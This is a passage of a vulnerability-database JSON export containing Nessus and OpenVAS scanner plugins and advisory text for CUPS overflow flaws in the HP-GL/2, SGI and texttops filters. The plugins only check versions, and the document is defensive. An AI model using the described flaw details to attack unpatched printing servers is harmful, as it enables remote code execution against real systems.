script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-1.1.20-108.54\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-client-1.1.20-108.54\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-devel-1.1.20-108.54\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-libs-1.1.20-108.54\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"cups-libs-32bit-9-200810021549\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:41:30", "description": "According to its banner, the version of CUPS installed on the remote\nhost is earlier than 1.3.9. Such versions are affected by several\nissues :\n\n - The HP-GL/2 filter does not adequately check the ranges\n on the pen width and pen color opcodes that allows an\n attacker to overwrite memory addresses with arbitrary\n data, which may result in execution of arbitrary code\n (STR #2911).\n\n - There is a heap-based buffer overflow in the SGI file\n format parsing module that can be triggered with\n malformed Run Length Encoded (RLE) data to execute\n arbitrary code (STR #2918).\n\n - There is an integer overflow vulnerability in the\n 'WriteProlog()' function in the 'texttops'\n application that can be triggered when calculating\n the page size used for storing PostScript data to\n execute arbitrary code (STR #2919).", "edition": 29, "published": "2008-10-10T00:00:00", "title": "CUPS < 1.3.9 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:apple:cups"], "id": "CUPS_1_3_9.NASL", "href": "https://www.tenable.com/plugins/nessus/34385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34385);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_bugtraq_id(31688, 31690);\n script_xref(name:\"Secunia\", value:\"32226\");\n\n script_name(english:\"CUPS < 1.3.9 Multiple Vulnerabilities\");\n script_summary(english:\"Checks CUPS server version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote printer service is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of CUPS installed on the remote\nhost is earlier than 1.3.9. Such versions are affected by several\nissues :\n\n - The HP-GL/2 filter does not adequately check the ranges\n on the pen width and pen color opcodes that allows an\n attacker to overwrite memory addresses with arbitrary\n data, which may result in execution of arbitrary code\n (STR #2911).\n\n - There is a heap-based buffer overflow in the SGI file\n format parsing module that can be triggered with\n malformed Run Length Encoded (RLE) data to execute\n arbitrary code (STR #2918).\n\n - There is an integer overflow vulnerability in the\n 'WriteProlog()' function in the 'texttops'\n application that can be triggered when calculating\n the page size used for storing PostScript data to\n execute arbitrary code (STR #2919).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-08-067/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2008/Oct/175\");\n # http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=752\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d39dc47a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2008/Nov/13\");\n # http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=753\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?12e95e4f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2008/Nov/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cups.org/str.php?L2911\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cups.org/str.php?L2918\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cups.org/str.php?L2919\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cups.org/articles.php?L575\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to CUPS version 1.3.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:cups\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"cups_1_3_5.nasl\");\n script_require_keys(\"www/cups\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 631);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:631, embedded:TRUE);\nget_kb_item_or_exit(\"www/\"+port+\"/cups/running\");\n\nversion = get_kb_item_or_exit(\"cups/\"+port+\"/version\");\nsource = get_kb_item_or_exit(\"cups/\"+port+\"/source\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.([0-2]|3\\.[0-8])($|[^0-9])\" ||\n version =~ \"^1\\.3(rc|b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.9\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse if (version =~ \"^(1|1\\.3)($|[^0-9.])\") audit(AUDIT_VER_NOT_GRANULAR, \"CUPS\", port, version);\nelse audit(AUDIT_LISTEN_NOT_VULN, \"CUPS\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:38:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-312-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231061862", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231061862", "type": "openvas", "title": "Slackware Advisory SSA:2008-312-01 cups", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_312_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.61862\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2008-312-01 cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-312-01\");\n\n script_tag(name:\"insight\", value:\"New cups packages are available for Slackware 12.0, 12.1, and -current to\nfix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2008-312-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"cups\", ver:\"1.3.9-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"cups\", ver:\"1.3.9-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:56:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "Check for the Version of cups", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830644", "href": "http://plugins.openvas.org/nasl.php?oid=830644", "type": "openvas", "title": "Mandriva Update for cups MDVSA-2008:211 (cups)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for cups MDVSA-2008:211 (cups)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow in the SGI image format decoding routines used by the\n CUPS image converting filter imagetops was discovered. An attacker\n could create malicious SGI image files that could possibly execute\n arbitrary code if the file was printed (CVE-2008-3639).\n\n An integer overflow flaw leading to a heap buffer overflow was found\n in the Text-to-PostScript texttops filter. An attacker could create\n a malicious text file that could possibly execute arbitrary code if\n the file was printed (CVE-2008-3640).\n \n Finally, an insufficient buffer bounds checking flaw was found in\n the HP-GL/2-to-PostScript hpgltops filter. An attacker could create\n a malicious HP-GL/2 file that could possibly execute arbitrary code\n if the file was printed (CVE-2008-3641).\n \n The updated packages have been patched to prevent this issue; for\n Mandriva Linux 2009.0 the latest CUPS version (1.3.9) is provided\n that corrects these issues and also provides other bug fixes.\";\n\ntag_affected = \"cups on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-10/msg00017.php\");\n script_id(830644);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:211\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_name( \"Mandriva Update for cups MDVSA-2008:211 (cups)\");\n\n script_summary(\"Check for the Version of cups\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.2.10~2.8mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.3.6~1.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.3.6~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.3.9~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "This host is running CUPS (Common UNIX Printing System) Service,\n which is prone to Buffer Overflow and Integer Overflow Vulnerabilities.", "modified": "2019-03-06T00:00:00", "published": "2008-10-14T00:00:00", "id": "OPENVAS:1361412562310800111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800111", "type": "openvas", "title": "CUPS Multiple Vulnerabilities - Oct08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cups_mult_vuln_oct08.nasl 14010 2019-03-06 08:24:33Z cfischer $\n#\n# CUPS Multiple Vulnerabilities - Oct08\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:cups\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800111\");\n script_version(\"$Revision: 14010 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-06 09:24:33 +0100 (Wed, 06 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-14 16:26:50 +0200 (Tue, 14 Oct 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_bugtraq_id(31681, 31688, 31690);\n script_name(\"CUPS Multiple Vulnerabilities - Oct08\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_cups_detect.nasl\");\n script_require_ports(\"Services/www\", 631);\n script_mandatory_keys(\"CUPS/installed\");\n\n script_xref(name:\"URL\", value:\"http://cups.org/articles.php?L575\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/32226/\");\n script_xref(name:\"URL\", value:\"http://www.frsirt.com/english/advisories/2008/2782/\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to execute arbitrary code or\n compromise a vulnerable system.\");\n\n script_tag(name:\"affected\", value:\"CUPS versions prior to 1.3.9.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to\n\n - an error in the implementation of the HP-GL/2 filter and can be\n exploited to cause buffer overflows with HP-GL/2 files containing overly\n large pen numbers.\n\n - an error within the read_rle8() and read_rle16() functions when\n parsing malformed Run Length Encoded(RLE) data within Silicon Graphics\n Image(SGI) files and can exploited to cause heap-based buffer overflow\n with a specially crafted SGI file.\n\n - an error within the WriteProlog() function included in the texttops\n utility and can be exploited to cause a heap-based buffer overflow with\n specially crafted file.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to CUPS version 1.3.9 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running CUPS (Common UNIX Printing System) Service,\n which is prone to Buffer Overflow and Integer Overflow Vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! vers = get_app_version( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( vers !~ \"[0-9]+\\.[0-9]+\\.[0-9]+\")\n exit( 0 ); # Version is not exact enough\n\nif( version_is_less( version:vers, test_version:\"1.3.9\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.3.9\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n cups\n cups-client\n cups-devel\n cups-libs\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065939", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065939", "type": "openvas", "title": "SLES10: Security update for CUPS", "sourceData": "#\n#VID slesp2-cups-5653\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for CUPS\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n cups\n cups-client\n cups-devel\n cups-libs\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65939\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for CUPS\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n 